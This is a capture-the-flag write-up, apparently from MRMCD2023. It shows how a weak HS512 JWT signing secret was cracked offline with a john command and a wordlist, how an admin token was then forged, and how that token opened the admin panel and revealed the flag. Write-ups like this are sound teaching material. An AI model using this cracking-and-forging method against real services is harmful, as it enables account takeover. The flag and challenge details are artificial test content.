Ok this time the implementation is absolutely flawless! My JWTs are stronger than your pathetic hacking attempts.

Screenshot of the linked page, you are provided with guest credentials.


I logged in with the provided credentials, which generated a JWT. The site behind the login page also reveals a link to the admin panel (Login for Admins). Since the text stated, that the implementation is absolutely flawless, I thought about what could go wrong besides implementation. Clearly passwords/key strength! So I took the generated JWT and had a look at it with jwt.io. But first the JWT:


A JWT consists of a header, a payload and a signature. In our case we had the following header:

  "typ": "JWT",
  "alg": "HS512"

The following payload:

  "user": "guest",
  "exp": 1699657597

And the following signature (obviously not decoded):


Since I wanted to access the admin panel and thought about weak keys/passwords I wanted to generate a JWT for the user ‘admin’ to access the admin panel. So I tried brute forcing it, trying differend wordlists I found online. At the actual event I solved it with a script I found online, but it is easily possible with john:

john jwt.txt --wordlist=shortKrak.txt --format=HMAC-SHA512

The password was Mellon which was included in the shortKrak wordlist. Now it was very easy to create an admin JWT with the help of jwt.io, I just had to send a GET request with that JWT to the path /admin. The admin panel showed the follwing text:

Realy????, you managed to break my super secret and opend the doors of Durin?Welcome in Moria!Here ist your flag: MRMCD2023{4b50lu73ly_p47h371c}.Well done!

So, that’s it:


Solved by petrosyan